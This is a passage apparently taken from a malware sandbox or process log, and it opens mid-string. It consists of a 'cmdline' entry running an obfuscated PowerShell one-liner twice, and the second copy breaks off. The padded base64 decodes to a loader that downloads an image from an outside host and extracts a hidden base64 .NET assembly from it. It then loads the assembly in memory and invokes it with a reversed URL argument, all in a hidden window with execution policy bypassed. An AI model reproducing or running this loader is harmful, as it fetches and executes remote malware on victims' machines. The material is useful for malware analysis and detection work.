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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	powershell -command "$Codigo = 'JAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVQByAuOvhPbYLGwAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBoAuOvhPbYLHQAuOvhPbYLdAuOvhPbYLBwAuOvhPbYLHMAuOvhPbYLOgAuOvhPbYLvAuOvhPbYLC8AuOvhPbYLdwBhAuOvhPbYLGwAuOvhPbYLbAuOvhPbYLBwAuOvhPbYLGEAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLHIAuOvhPbYLYwBhAuOvhPbYLHYAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLGMAuOvhPbYLbwBtAuOvhPbYLC8AuOvhPbYLdQB3AuOvhPbYLHAuOvhPbYLAuOvhPbYLLwB1AuOvhPbYLHcAuOvhPbYLcAuOvhPbYLAuOvhPbYL0AuOvhPbYLDAuOvhPbYLAuOvhPbYLOAuOvhPbYLAuOvhPbYLyAuOvhPbYLDkAuOvhPbYLOAuOvhPbYLAuOvhPbYL5AuOvhPbYLC4AuOvhPbYLcAuOvhPbYLBuAuOvhPbYLGcAuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLdwBlAuOvhPbYLGIAuOvhPbYLQwBsAuOvhPbYLGkAuOvhPbYLZQBuAuOvhPbYLHQAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLTgBlAuOvhPbYLHcAuOvhPbYLLQBPAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLTgBlAuOvhPbYLHQAuOvhPbYLLgBXAuOvhPbYLGUAuOvhPbYLYgBDAuOvhPbYLGwAuOvhPbYLaQBlAuOvhPbYLG4AuOvhPbYLdAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLHcAuOvhPbYLZQBiAuOvhPbYLEMAuOvhPbYLbAuOvhPbYLBpAuOvhPbYLGUAuOvhPbYLbgB0AuOvhPbYLC4AuOvhPbYLRAuOvhPbYLBvAuOvhPbYLHcAuOvhPbYLbgBsAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLEQAuOvhPbYLYQB0AuOvhPbYLGEAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBVAuOvhPbYLHIAuOvhPbYLbAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLuAuOvhPbYLEUAuOvhPbYLbgBjAuOvhPbYLG8AuOvhPbYLZAuOvhPbYLBpAuOvhPbYLG4AuOvhPbYLZwBdAuOvhPbYLDoAuOvhPbYLOgBVAuOvhPbYLFQAuOvhPbYLRgAuOvhPbYL4AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLUwB0AuOvhPbYLHIAuOvhPbYLaQBuAuOvhPbYLGcAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBCAuOvhPbYLHkAuOvhPbYLdAuOvhPbYLBlAuOvhPbYLHMAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBTAuOvhPbYLFQAuOvhPbYLQQBSAuOvhPbYLFQAuOvhPbYLPgAuOvhPbYL+AuOvhPbYLCcAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGUAuOvhPbYLbgBkAuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBFAuOvhPbYLE4AuOvhPbYLRAuOvhPbYLAuOvhPbYL+AuOvhPbYLD4AuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBUAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLB0AuOvhPbYLC4AuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLE8AuOvhPbYLZgAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLZQBuAuOvhPbYLGQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLTwBmAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBGAuOvhPbYLGwAuOvhPbYLYQBnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLHMAuOvhPbYLdAuOvhPbYLBhAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLZQAuOvhPbYLgAuOvhPbYLDAuOvhPbYLAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLCsAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLLgBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLYgBhAuOvhPbYLHMAuOvhPbYLZQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLTAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZwB0AuOvhPbYLGgAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBzAuOvhPbYLHQAuOvhPbYLYQByAuOvhPbYLHQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBTAuOvhPbYLHUAuOvhPbYLYgBzAuOvhPbYLHQAuOvhPbYLcgBpAuOvhPbYLG4AuOvhPbYLZwAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLQwBvAuOvhPbYLG4AuOvhPbYLdgBlAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBdAuOvhPbYLDoAuOvhPbYLOgBGAuOvhPbYLHIAuOvhPbYLbwBtAuOvhPbYLEIAuOvhPbYLYQBzAuOvhPbYLGUAuOvhPbYLNgAuOvhPbYL0AuOvhPbYLFMAuOvhPbYLdAuOvhPbYLByAuOvhPbYLGkAuOvhPbYLbgBnAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGwAuOvhPbYLbwBhAuOvhPbYLGQAuOvhPbYLZQBkAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLUgBlAuOvhPbYLGYAuOvhPbYLbAuOvhPbYLBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBpAuOvhPbYLG8AuOvhPbYLbgAuOvhPbYLuAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQBdAuOvhPbYLDoAuOvhPbYLOgBMAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLB0AuOvhPbYLHkAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLbAuOvhPbYLBvAuOvhPbYLGEAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLGQAuOvhPbYLQQBzAuOvhPbYLHMAuOvhPbYLZQBtAuOvhPbYLGIAuOvhPbYLbAuOvhPbYLB5AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLVAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCcAuOvhPbYLRgBpAuOvhPbYLGIAuOvhPbYLZQByAuOvhPbYLC4AuOvhPbYLSAuOvhPbYLBvAuOvhPbYLG0AuOvhPbYLZQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLG0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLdAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLEcAuOvhPbYLZQB0AuOvhPbYLE0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCgAuOvhPbYLJwBWAuOvhPbYLEEAuOvhPbYLSQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLdgBvAuOvhPbYLGsAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLbgB1AuOvhPbYLGwAuOvhPbYLbAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLWwBvAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBbAuOvhPbYLF0AuOvhPbYLXQAuOvhPbYLgAuOvhPbYLCgAuOvhPbYLJwBkAuOvhPbYLEgAuOvhPbYLaAuOvhPbYLAuOvhPbYLwAuOvhPbYLEwAuOvhPbYLbQBkAuOvhPbYLHUAuOvhPbYLYQBXAuOvhPbYLDUAuOvhPbYLcAuOvhPbYLBiAuOvhPbYLG0AuOvhPbYLbAuOvhPbYLBuAuOvhPbYLFoAuOvhPbYLVwBK